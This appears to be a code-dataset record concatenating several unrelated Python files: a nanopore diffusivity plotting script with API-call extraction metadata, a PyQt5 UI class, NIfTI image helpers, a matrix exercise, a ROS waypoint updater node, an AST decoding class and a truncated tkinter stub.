plt.scatter(x,Dzz,color='green')
#plt.plot(x,Dzz,color='green')
plt.plot(xc,Dz(xc),color='green',label=r"$D_{%s%s}$" % (dstr[2], dstr[2]))
plt.scatter(x,DDzz,color='green')
#plt.plot(x,DDzz,color='green')
plt.plot(xc,dDz(xc),color='green')
plt.xlabel('distance from pore center [nm]')
plt.ylabel('diffusivity relative to bulk')
plt.legend(loc='lower left')
plt.tight_layout()
plt.savefig('get_new.png')
| [
"nanopores.tools.fields.get_fields",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.ylabel",
"matplotlib.use",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"os.path.join",
"scipy.interpolate.interp1d",
"numpy.inner",
"numpy.array",
"numpy.linspace",
"num... | [((18, 39), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (32, 39), False, 'import matplotlib\n'), ((188, 211), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (206, 211), False, 'import os\n'), ((222, 274), 'os.path.join', 'os.path.join', (['HOME', '"""Dropbox"""', '"""nanopores"""', '"""fields"""'], {}), "(HOME, 'Dropbox', 'nanopores', 'fields')\n", (234, 274), False, 'import os\n'), ((275, 298), 'nanopores.tools.fields.set_dir', 'fields.set_dir', (['DATADIR'], {}), '(DATADIR)\n', (289, 298), False, 'from nanopores.tools import fields\n'), ((307, 376), 'nanopores.tools.fields.get_fields', 'fields.get_fields', (['"""pugh_diff3D_cross"""'], {'bulkbc': '(True)', 'rMolecule': '(2.0779)'}), "('pugh_diff3D_cross', bulkbc=True, rMolecule=2.0779)\n", (324, 376), False, 'from nanopores.tools import fields\n'), ((1053, 1076), 'nanopores.tools.fields._sorted', 'fields._sorted', (['data', 'x'], {}), '(data, x)\n', (1067, 1076), False, 'from nanopores.tools import fields\n'), ((1732, 1748), 'scipy.interpolate.interp1d', 'interp1d', (['x', 'Dxx'], {}), '(x, Dxx)\n', (1740, 1748), False, 'from scipy.interpolate import interp1d\n'), ((1753, 1769), 'scipy.interpolate.interp1d', 'interp1d', (['x', 'Dyy'], {}), '(x, Dyy)\n', (1761, 1769), False, 'from scipy.interpolate import interp1d\n'), ((1774, 1790), 'scipy.interpolate.interp1d', 'interp1d', (['x', 'Dzz'], {}), '(x, Dzz)\n', (1782, 1790), False, 'from scipy.interpolate import interp1d\n'), ((2044, 2061), 'scipy.interpolate.interp1d', 'interp1d', (['x', 'DDxx'], {}), '(x, DDxx)\n', (2052, 2061), False, 'from scipy.interpolate import interp1d\n'), ((2067, 2084), 'scipy.interpolate.interp1d', 'interp1d', (['x', 'DDyy'], {}), '(x, DDyy)\n', (2075, 2084), False, 'from scipy.interpolate import interp1d\n'), ((2090, 2107), 'scipy.interpolate.interp1d', 'interp1d', (['x', 'DDzz'], {}), '(x, DDzz)\n', (2098, 2107), False, 'from scipy.interpolate import interp1d\n'), ((399, 410), 'numpy.array', 'np.array', (['l'], {}), '(l)\n', (407, 410), True, 'import numpy as np\n'), ((430, 467), 'numpy.array', 'np.array', (['[1.0 / 3, 1.0 / 3, 1.0 / 3]'], {}), '([1.0 / 3, 1.0 / 3, 1.0 / 3])\n', (438, 467), True, 'import numpy as np\n'), ((601, 612), 'numpy.array', 'np.array', (['l'], {}), '(l)\n', (609, 612), True, 'import numpy as np\n'), ((632, 667), 'numpy.array', 'np.array', (['[0.2, 0.2, 0.2, 0.2, 0.2]'], {}), '([0.2, 0.2, 0.2, 0.2, 0.2])\n', (640, 667), True, 'import numpy as np\n'), ((803, 814), 'numpy.array', 'np.array', (['l'], {}), '(l)\n', (811, 814), True, 'import numpy as np\n'), ((834, 874), 'numpy.array', 'np.array', (['[10.0, 12.0, 15.0, 12.0, 10.0]'], {}), '([10.0, 12.0, 15.0, 12.0, 10.0])\n', (842, 874), True, 'import numpy as np\n'), ((2137, 2163), 'numpy.linspace', 'np.linspace', (['(0.0)', '(1.0)', '(100)'], {}), '(0.0, 1.0, 100)\n', (2148, 2163), True, 'import numpy as np\n'), ((2161, 2208), 'matplotlib.pyplot.plot', 'plt.plot', (['x_', 'Dxx_'], {'color': '"""blue"""', 'linestyle': '""":"""'}), "(x_, Dxx_, color='blue', linestyle=':')\n", (2169, 2208), True, 'from matplotlib import pyplot as plt\n'), ((2207, 2242), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x_', 'Dxx_'], {'color': '"""blue"""'}), "(x_, Dxx_, color='blue')\n", (2218, 2242), True, 'from matplotlib import pyplot as plt\n'), ((2242, 2275), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'Dxx'], {'color': '"""blue"""'}), "(x, Dxx, color='blue')\n", (2253, 2275), True, 'from matplotlib import pyplot as plt\n'), ((2382, 2416), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'DDxx'], {'color': '"""blue"""'}), "(x, DDxx, color='blue')\n", (2393, 2416), True, 'from matplotlib import pyplot as plt\n'), ((2486, 2532), 'matplotlib.pyplot.plot', 'plt.plot', (['x_', 'Dyy_'], {'color': '"""red"""', 'linestyle': '""":"""'}), "(x_, Dyy_, color='red', linestyle=':')\n", (2494, 2532), True, 'from matplotlib import pyplot as plt\n'), ((2531, 2565), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x_', 'Dyy_'], {'color': '"""red"""'}), "(x_, Dyy_, color='red')\n", (2542, 2565), True, 'from matplotlib import pyplot as plt\n'), ((2565, 2597), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'Dyy'], {'color': '"""red"""'}), "(x, Dyy, color='red')\n", (2576, 2597), True, 'from matplotlib import pyplot as plt\n'), ((2702, 2735), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'DDyy'], {'color': '"""red"""'}), "(x, DDyy, color='red')\n", (2713, 2735), True, 'from matplotlib import pyplot as plt\n'), ((2803, 2851), 'matplotlib.pyplot.plot', 'plt.plot', (['x_', 'Dzz_'], {'color': '"""green"""', 'linestyle': '""":"""'}), "(x_, Dzz_, color='green', linestyle=':')\n", (2811, 2851), True, 'from matplotlib import pyplot as plt\n'), ((2850, 2886), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x_', 'Dzz_'], {'color': '"""green"""'}), "(x_, Dzz_, color='green')\n", (2861, 2886), True, 'from matplotlib import pyplot as plt\n'), ((2886, 2920), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'Dzz'], {'color': '"""green"""'}), "(x, Dzz, color='green')\n", (2897, 2920), True, 'from matplotlib import pyplot as plt\n'), ((3029, 3064), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'DDzz'], {'color': '"""green"""'}), "(x, DDzz, color='green')\n", (3040, 3064), True, 'from matplotlib import pyplot as plt\n'), ((3136, 3180), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""distance from pore center [nm]"""'], {}), "('distance from pore center [nm]')\n", (3146, 3180), True, 'from matplotlib import pyplot as plt\n'), ((3182, 3224), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""diffusivity relative to bulk"""'], {}), "('diffusivity relative to bulk')\n", (3192, 3224), True, 'from matplotlib import pyplot as plt\n'), ((3226, 3254), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""lower left"""'}), "(loc='lower left')\n", (3236, 3254), True, 'from matplotlib import pyplot as plt\n'), ((3256, 3274), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (3272, 3274), True, 'from matplotlib import pyplot as plt\n'), ((3276, 3302), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""get_new.png"""'], {}), "('get_new.png')\n", (3287, 3302), True, 'from matplotlib import pyplot as plt\n'), ((533, 566), 'numpy.inner', 'np.inner', (['A[i - n:i + n + 1]', 'ker'], {}), '(A[i - n:i + n + 1], ker)\n', (541, 566), True, 'import numpy as np\n'), ((735, 768), 'numpy.inner', 'np.inner', (['A[i - n:i + n + 1]', 'ker'], {}), '(A[i - n:i + n + 1], ker)\n', (743, 768), True, 'import numpy as np\n'), ((878, 889), 'numpy.sum', 'np.sum', (['ker'], {}), '(ker)\n', (884, 889), True, 'import numpy as np\n'), ((966, 999), 'numpy.inner', 'np.inner', (['A[i - n:i + n + 1]', 'ker'], {}), '(A[i - n:i + n + 1], ker)\n', (974, 999), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'hnc.ui'
#
# Created by: PyQt5 UI code generator 5.15.6
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(QtWidgets.QMainWindow):
def __init__(self, cc, tm, parent=None):
super().__init__(parent)
self.cc = cc
self.setupUi(self)
self.tm = tm
self.connect_signals()
def update_stlbl(self):
if self.cc.poll():
msg = self.cc.recv()
self.statuslbl.setText(msg)
def comm(self):
self.cc.send("listen")
def connect_signals(self):
self.pushButton.clicked.connect(self.comm)
self.tm.timeout.connect(self.update_stlbl)
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(365, 403)
MainWindow.setStyleSheet("background-color: rgb(53, 53, 53);")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.pushButton = QtWidgets.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(110, 230, 150, 150))
self.pushButton.setMinimumSize(QtCore.QSize(40, 40))
self.pushButton.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.pushButton.setStyleSheet("QPushButton {\n"
" color: rgb(39, 212, 111);\n"
" border: 2px solid #555;\n"
" border-radius: 75px;\n"
" border-style: outset;\n"
" background:rgb(58, 255, 81);\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: rgb(63, 231, 74)\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: rgb(53, 221, 64)\n"
" }")
self.pushButton.setText("")
self.pushButton.setIconSize(QtCore.QSize(40, 40))
self.pushButton.setObjectName("pushButton")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(29, 30, 81, 31))
self.label.setStyleSheet("font: 25 20pt \"Bahnschrift Light Condensed\";\n"
"color: rgb(96, 255, 60);")
self.label.setObjectName("label")
self.statuslbl = QtWidgets.QLabel(self.centralwidget)
self.statuslbl.setGeometry(QtCore.QRect(30, 180, 500, 31))
self.statuslbl.setStyleSheet("font: 25 15pt \"Bahnschrift Light Condensed\";\n"
"color: rgb(96, 255, 60);")
self.statuslbl.setText("")
self.statuslbl.setObjectName("statuslbl")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", " "))
self.label.setText(_translate("MainWindow", "pyTunes"))
self.statuslbl.setText(_translate("MainWindow", "Press the button to begin.."))
def uifunc(cc):
app = QtWidgets.QApplication([])
tm = QtCore.QTimer()
win = Ui_MainWindow(cc, tm)
win.show()
tm.start(1000)
app.exec() | [
"PyQt5.QtWidgets.QWidget",
"PyQt5.QtCore.QMetaObject.connectSlotsByName",
"PyQt5.QtCore.QTimer",
"PyQt5.QtCore.QRect",
"PyQt5.QtWidgets.QLabel",
"PyQt5.QtWidgets.QApplication",
"PyQt5.QtWidgets.QPushButton",
"PyQt5.QtCore.QSize"
] | [((3802, 3828), 'PyQt5.QtWidgets.QApplication', 'QtWidgets.QApplication', (['[]'], {}), '([])\n', (3824, 3828), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3838, 3853), 'PyQt5.QtCore.QTimer', 'QtCore.QTimer', ([], {}), '()\n', (3851, 3853), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1088, 1117), 'PyQt5.QtWidgets.QWidget', 'QtWidgets.QWidget', (['MainWindow'], {}), '(MainWindow)\n', (1105, 1117), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1202, 1243), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralwidget'], {}), '(self.centralwidget)\n', (1223, 1243), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2656, 2692), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2672, 2692), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2966, 3002), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2982, 3002), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3412, 3461), 'PyQt5.QtCore.QMetaObject.connectSlotsByName', 'QtCore.QMetaObject.connectSlotsByName', (['MainWindow'], {}), '(MainWindow)\n', (3449, 3461), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1280, 1312), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(110)', '(230)', '(150)', '(150)'], {}), '(110, 230, 150, 150)\n', (1292, 1312), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1353, 1373), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(40)', '(40)'], {}), '(40, 40)\n', (1365, 1373), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1414, 1446), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(16777215)', '(16777215)'], {}), '(16777215, 16777215)\n', (1426, 1446), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2561, 2581), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(40)', '(40)'], {}), '(40, 40)\n', (2573, 2581), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2724, 2752), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(29)', '(30)', '(81)', '(31)'], {}), '(29, 30, 81, 31)\n', (2736, 2752), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3038, 3068), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(30)', '(180)', '(500)', '(31)'], {}), '(30, 180, 500, 31)\n', (3050, 3068), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n')] |
import os
import nibabel
import numpy as np
import random
from scipy import ndimage
import SimpleITK as sitk
def load_nifty_volume_as_array(filename, with_header = False):
"""
load nifty image into numpy array, and transpose it based on the [z,y,x] axis order
The output array shape is like [Depth, Height, Width]
inputs:
filename: the input file name, should be *.nii or *.nii.gz
with_header: return affine and hearder infomation
outputs:
data: a numpy data array
"""
img = nibabel.load(filename)
data = img.get_data()
data = np.transpose(data, [2,1,0])
if(with_header):
return data, img.affine, img.header
else:
return data
def save_array_as_nifty_volume(data, filename, reference_name = None):
"""
save a numpy array as nifty image
inputs:
data: a numpy array with shape [Depth, Height, Width]
filename: the ouput file name
reference_name: file name of the reference image of which affine and header are used
outputs: None
"""
img = sitk.GetImageFromArray(data)
if(reference_name is not None):
img_ref = sitk.ReadImage(reference_name)
img.CopyInformation(img_ref)
sitk.WriteImage(img, filename)
| [
"SimpleITK.GetImageFromArray",
"nibabel.load",
"SimpleITK.WriteImage",
"SimpleITK.ReadImage",
"numpy.transpose"
] | [((529, 551), 'nibabel.load', 'nibabel.load', (['filename'], {}), '(filename)\n', (541, 551), False, 'import nibabel\n'), ((589, 618), 'numpy.transpose', 'np.transpose', (['data', '[2, 1, 0]'], {}), '(data, [2, 1, 0])\n', (601, 618), True, 'import numpy as np\n'), ((1071, 1099), 'SimpleITK.GetImageFromArray', 'sitk.GetImageFromArray', (['data'], {}), '(data)\n', (1093, 1099), True, 'import SimpleITK as sitk\n'), ((1226, 1256), 'SimpleITK.WriteImage', 'sitk.WriteImage', (['img', 'filename'], {}), '(img, filename)\n', (1241, 1256), True, 'import SimpleITK as sitk\n'), ((1154, 1184), 'SimpleITK.ReadImage', 'sitk.ReadImage', (['reference_name'], {}), '(reference_name)\n', (1168, 1184), True, 'import SimpleITK as sitk\n')] |
from random import randint
s = t = ma = 0
m = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
for l in range(0, 3):
for c in range(0, 3):
m[l][c] = randint(0, 100)
print('-='*15)
for l in range(0, 3):
t += m[l][2]
for c in range(0, 3):
print(f'[{m[l][c]:^5}]', end='')
if m[l][c] % 2 == 0:
s += m[l][c]
if m[1][c] > ma:
ma = m[1][c]
print()
print('-='*15)
print(f'A soma dos núemros pares é {s}')
print(f'A soma dos valores da terceira coluna é {t}')
print(f'O maior valor da segunda linha é {ma}') | [
"random.randint"
] | [((146, 161), 'random.randint', 'randint', (['(0)', '(100)'], {}), '(0, 100)\n', (153, 161), False, 'from random import randint\n')] |
#!/usr/bin/env python
import rospy as rp
import numpy as np
import math as math
from geometry_msgs.msg import PoseStamped, TwistStamped
from styx_msgs.msg import Lane, Waypoint
from scipy.spatial import KDTree
from std_msgs.msg import Int32
'''
This node will publish waypoints from the car's current position to some `x` distance ahead.
As mentioned in the doc, you should ideally first implement a version which does not care
about traffic lights or obstacles.
Once you have created dbw_node, you will update this node to use the status of traffic lights too.
Please note that our simulator also provides the exact location of traffic lights and their
current status in `/vehicle/traffic_lights` message. You can use this message to build this node
as well as to verify your TL classifier.
TODO (for Yousuf and Aaron): Stopline location for each traffic light.
'''
# Number of waypoints we will publish.
LOOKAHEAD_WPS = 150
MAX_DECEL = 0.5
class MotionState( ):
Go, Stop = range( 2 )
class WaypointUpdater( object ):
def __init__( self ):
rp.init_node( 'waypoint_updater' )
# TODO: Add a subscriber for /traffic_waypoint and /obstacle_waypoint below
rp.Subscriber( '/current_pose', PoseStamped, self.pose_cb )
rp.Subscriber( '/base_waypoints', Lane, self.waypoints_cb )
rp.Subscriber( '/traffic_waypoint', Int32, self.traffic_cb )
rp.Subscriber( '/current_velocity', TwistStamped, self.velocity_cb )
self.final_waypoints_pub = rp.Publisher(
'final_waypoints',
Lane,
queue_size=1 )
# TODO: Add other member variables you need below
self.base_lane = None
self.pose = None
self.waypoints_2d = None
self.waypoint_tree = None
self.nearest_light = None
self.vehicle_velocity = None # in m/s
self.motion_state = MotionState.Go
self.deceleration_rate = None
self.acceleration_rate = 0.75 # m/s
self.previous_velocity = None
self.loop( )
def loop( self ):
rate = rp.Rate( 10 )
while not rp.is_shutdown( ):
if self.pose and self.base_lane and self.waypoint_tree:
# get closest waypoint
#closest_waypoint_index = self.get_closest_waypoint_id( )
self.publish_waypoints( )
self.previous_velocity = self.vehicle_velocity
rate.sleep( )
def publish_waypoints( self ):
self.final_waypoints_pub.publish( self.generate_lane( ) )
def generate_lane( self ):
lane = Lane( )
closest_idx = self.get_closest_waypoint_id( )
farthest_idx = closest_idx + LOOKAHEAD_WPS
base_waypoints = self.base_lane[ closest_idx:farthest_idx ]
if self.nearest_light != None and \
self.nearest_light <= farthest_idx and \
self.nearest_light >= closest_idx:
self.motion_state = MotionState.Stop
base_waypoints = self.decelerate( base_waypoints, closest_idx )
elif self.motion_state == MotionState.Stop:
self.motion_state = MotionState.Go
self.deceleration_rate = None
if self.motion_state == MotionState.Go:
if abs( self.vehicle_velocity - self.get_waypoint_velocity( \
base_waypoints[ 0 ] ) ) > 1.0:
if self.previous_velocity == None:
start_vel = self.vehicle_velocity
else:
start_vel = max(
self.previous_velocity + 0.2,
self.vehicle_velocity )
base_waypoints = self.accelerate( base_waypoints, start_vel )
else:
self.acceleration_start_velocity = None
lane.waypoints = base_waypoints
return lane
def accelerate( self, waypoints, start_velocity ):
new_waypoints = [ ]
for i, wp in enumerate( waypoints ):
p = Waypoint( )
p.pose = wp.pose
distance = self.distance( waypoints, 0, i )
target_vel = start_velocity + distance * self.acceleration_rate
if target_vel < 0.5:
target_vel = 0.5
p.twist.twist.linear.x = min(
target_vel,
self.get_waypoint_velocity( wp ) )
new_waypoints.append( p )
return new_waypoints
def decelerate( self, waypoints, start_idx ):
new_waypoints = [ ]
speed = self.vehicle_velocity
# two waypoints back from line so front of car stops earlier
stop_idx = self.nearest_light - start_idx - 2
for i, wp in enumerate( waypoints ):
p = Waypoint( )
p.pose = wp.pose
dist = self.distance( waypoints, i, stop_idx )
if i >= stop_idx:
target_vel = 0
elif dist < 15:
if self.deceleration_rate == None:
self.deceleration_rate = self.vehicle_velocity / dist
target_vel = self.deceleration_rate * dist
if target_vel <= 1.0:
target_vel = 0.0
target_vel = min( target_vel, self.get_waypoint_velocity( wp ) )
else:
target_vel = self.get_waypoint_velocity( wp )
p.twist.twist.linear.x = target_vel
new_waypoints.append( p )
return new_waypoints
def get_closest_waypoint_id( self ):
x = self.pose.pose.position.x
y = self.pose.pose.position.y
closest_idx = self.waypoint_tree.query( [x, y], 1 )[1]
# Check if closest waypoint is ahead or behind the vehicle
closest_wp = np.array( self.waypoints_2d[ closest_idx ] )
previous_wp = np.array( self.waypoints_2d[ closest_idx - 1 ] )
# Equation for hyperplane through closest_coords
waypoint_vector = closest_wp - previous_wp
position_vector = np.array( [x, y] ) - closest_wp
val = np.dot( waypoint_vector, position_vector )
if val > 0:
closest_idx = ( closest_idx + 1 ) % len( self.waypoints_2d )
return closest_idx
def pose_cb(self, msg):
# TODO: Implement
self.pose = msg
def waypoints_cb( self, waypoints ):
# TODO: Implement
self.base_lane = waypoints.waypoints
if not self.waypoints_2d:
self.waypoints_2d = [ [ waypoint.pose.pose.position.x,
waypoint.pose.pose.position.y ]
for waypoint in waypoints.waypoints ]
self.waypoint_tree = KDTree( self.waypoints_2d )
def traffic_cb( self, msg ):
# TODO: Callback for /traffic_waypoint message. Implement
if( msg.data == -1 ):
self.nearest_light = None
else:
self.nearest_light = msg.data
def velocity_cb( self, velocity ):
self.vehicle_velocity = velocity.twist.linear.x
def obstacle_cb(self, msg):
# TODO: Callback for /obstacle_waypoint message. We will implement it later
pass
def get_waypoint_velocity( self, waypoint ):
return waypoint.twist.twist.linear.x
def set_waypoint_velocity( self, waypoints, waypoint, velocity ):
waypoints[ waypoint ].twist.twist.linear.x = velocity
def distance(self, waypoints, wp1, wp2):
dist = 0
dl = lambda a, b: math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2 + (a.z-b.z)**2)
for i in range(wp1, wp2+1):
dist += dl(waypoints[wp1].pose.pose.position, waypoints[i].pose.pose.position)
wp1 = i
return dist
if __name__ == '__main__':
try:
WaypointUpdater()
except rp.ROSInterruptException:
rp.logerr('Could not start waypoint updater node.')
| [
"rospy.logerr",
"rospy.Subscriber",
"rospy.is_shutdown",
"rospy.init_node",
"scipy.spatial.KDTree",
"math.sqrt",
"numpy.array",
"numpy.dot",
"rospy.Rate",
"styx_msgs.msg.Waypoint",
"rospy.Publisher",
"styx_msgs.msg.Lane"
] | [((1071, 1103), 'rospy.init_node', 'rp.init_node', (['"""waypoint_updater"""'], {}), "('waypoint_updater')\n", (1083, 1103), True, 'import rospy as rp\n'), ((1199, 1256), 'rospy.Subscriber', 'rp.Subscriber', (['"""/current_pose"""', 'PoseStamped', 'self.pose_cb'], {}), "('/current_pose', PoseStamped, self.pose_cb)\n", (1212, 1256), True, 'import rospy as rp\n'), ((1267, 1324), 'rospy.Subscriber', 'rp.Subscriber', (['"""/base_waypoints"""', 'Lane', 'self.waypoints_cb'], {}), "('/base_waypoints', Lane, self.waypoints_cb)\n", (1280, 1324), True, 'import rospy as rp\n'), ((1335, 1393), 'rospy.Subscriber', 'rp.Subscriber', (['"""/traffic_waypoint"""', 'Int32', 'self.traffic_cb'], {}), "('/traffic_waypoint', Int32, self.traffic_cb)\n", (1348, 1393), True, 'import rospy as rp\n'), ((1404, 1470), 'rospy.Subscriber', 'rp.Subscriber', (['"""/current_velocity"""', 'TwistStamped', 'self.velocity_cb'], {}), "('/current_velocity', TwistStamped, self.velocity_cb)\n", (1417, 1470), True, 'import rospy as rp\n'), ((1509, 1560), 'rospy.Publisher', 'rp.Publisher', (['"""final_waypoints"""', 'Lane'], {'queue_size': '(1)'}), "('final_waypoints', Lane, queue_size=1)\n", (1521, 1560), True, 'import rospy as rp\n'), ((2099, 2110), 'rospy.Rate', 'rp.Rate', (['(10)'], {}), '(10)\n', (2106, 2110), True, 'import rospy as rp\n'), ((2613, 2619), 'styx_msgs.msg.Lane', 'Lane', ([], {}), '()\n', (2617, 2619), False, 'from styx_msgs.msg import Lane, Waypoint\n'), ((5765, 5805), 'numpy.array', 'np.array', (['self.waypoints_2d[closest_idx]'], {}), '(self.waypoints_2d[closest_idx])\n', (5773, 5805), True, 'import numpy as np\n'), ((5832, 5876), 'numpy.array', 'np.array', (['self.waypoints_2d[closest_idx - 1]'], {}), '(self.waypoints_2d[closest_idx - 1])\n', (5840, 5876), True, 'import numpy as np\n'), ((6063, 6103), 'numpy.dot', 'np.dot', (['waypoint_vector', 'position_vector'], {}), '(waypoint_vector, position_vector)\n', (6069, 6103), True, 'import numpy as np\n'), ((2132, 2148), 'rospy.is_shutdown', 'rp.is_shutdown', ([], {}), '()\n', (2146, 2148), True, 'import rospy as rp\n'), ((4024, 4034), 'styx_msgs.msg.Waypoint', 'Waypoint', ([], {}), '()\n', (4032, 4034), False, 'from styx_msgs.msg import Lane, Waypoint\n'), ((4767, 4777), 'styx_msgs.msg.Waypoint', 'Waypoint', ([], {}), '()\n', (4775, 4777), False, 'from styx_msgs.msg import Lane, Waypoint\n'), ((6016, 6032), 'numpy.array', 'np.array', (['[x, y]'], {}), '([x, y])\n', (6024, 6032), True, 'import numpy as np\n'), ((6668, 6693), 'scipy.spatial.KDTree', 'KDTree', (['self.waypoints_2d'], {}), '(self.waypoints_2d)\n', (6674, 6693), False, 'from scipy.spatial import KDTree\n'), ((7468, 7533), 'math.sqrt', 'math.sqrt', (['((a.x - b.x) ** 2 + (a.y - b.y) ** 2 + (a.z - b.z) ** 2)'], {}), '((a.x - b.x) ** 2 + (a.y - b.y) ** 2 + (a.z - b.z) ** 2)\n', (7477, 7533), True, 'import math as math\n'), ((7799, 7850), 'rospy.logerr', 'rp.logerr', (['"""Could not start waypoint updater node."""'], {}), "('Could not start waypoint updater node.')\n", (7808, 7850), True, 'import rospy as rp\n')] |
# Copyright 2017 Rice University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from program_helper.ast.ops import DAPIInvoke
from synthesis.ops.candidate_ast import SYMTAB_MOD, TYPE_NODE, API_NODE, VAR_NODE, OP_NODE, METHOD_NODE, CLSTYPE_NODE, \
VAR_DECL_NODE
class AstReverseMapper:
def __init__(self, vocab):
self.vocab = vocab
self.nodes, self.edges, self.targets = [], [], []
self.var_decl_ids = []
self.node_type_numbers = []
self.type_helper_val, self.expr_type_val, self.ret_type_val = [], [], []
self.num_data = 0
return
def add_data(self, nodes, edges, targets,
var_decl_ids,
node_type_number,
type_helper_val, expr_type_val, ret_type_val):
self.nodes.extend(nodes)
self.edges.extend(edges)
self.targets.extend(targets)
self.var_decl_ids.extend(var_decl_ids)
self.node_type_numbers.extend(node_type_number)
self.type_helper_val.extend(type_helper_val)
self.expr_type_val.extend(expr_type_val)
self.ret_type_val.extend(ret_type_val)
self.num_data += len(nodes)
def get_element(self, id):
return self.nodes[id], self.edges[id], self.targets[id], \
self.var_decl_ids[id], \
self.node_type_numbers[id], \
self.type_helper_val[id], self.expr_type_val[id], self.ret_type_val[id]
def decode_ast_paths(self, ast_element, partial=True):
nodes, edges, targets, \
var_decl_ids, \
node_type_numbers, \
type_helper_vals, expr_type_vals, ret_type_vals = ast_element
for node in nodes:
print(self.vocab.chars_concept[node], end=',')
print()
#
for edge in edges:
print(edge, end=',')
print()
for _, _, target, \
var_decl_id, \
node_type_numbers, \
type_helper_val, expr_type_val, ret_type_val in zip(*ast_element):
if node_type_numbers == SYMTAB_MOD:
print('--symtab--', end=',')
elif node_type_numbers == VAR_NODE:
print(self.vocab.chars_var[target], end=',')
elif node_type_numbers == VAR_DECL_NODE:
print(self.vocab.chars_var[target], end=',')
elif node_type_numbers == TYPE_NODE:
print(self.vocab.chars_type[target], end=',')
elif node_type_numbers == CLSTYPE_NODE:
print(self.vocab.chars_type[target], end=',')
elif node_type_numbers == API_NODE:
api = self.vocab.chars_api[target]
api = api.split(DAPIInvoke.delimiter())[0]
print(api, end=',')
elif node_type_numbers == OP_NODE:
op = self.vocab.chars_op[target]
print(op, end=',')
elif node_type_numbers == METHOD_NODE:
op = self.vocab.chars_method[target]
print(op, end=',')
else:
print(self.vocab.chars_concept[target], end=',')
print()
if not partial:
for var_decl_id in var_decl_ids:
print(var_decl_id, end=',')
print()
for type_helper_val in type_helper_vals:
print(self.vocab.chars_type[type_helper_val], end=',')
print()
for expr_type_val in expr_type_vals:
print(self.vocab.chars_type[expr_type_val], end=',')
print()
for ret_type_val in ret_type_vals:
print(self.vocab.chars_type[ret_type_val], end=',')
print()
print()
def reset(self):
self.nodes, self.edges, self.targets = [], [], []
self.var_decl_ids = []
self.node_type_numbers = []
self.type_helper_val, self.expr_type_val, self.ret_type_val = [], [], []
self.num_data = 0 | [
"program_helper.ast.ops.DAPIInvoke.delimiter"
] | [((3184, 3206), 'program_helper.ast.ops.DAPIInvoke.delimiter', 'DAPIInvoke.delimiter', ([], {}), '()\n', (3204, 3206), False, 'from program_helper.ast.ops import DAPIInvoke\n')] |
from tkinter import *
from tkinter import filedialog
from pyascii import main
class App:
def __init__(self, master):
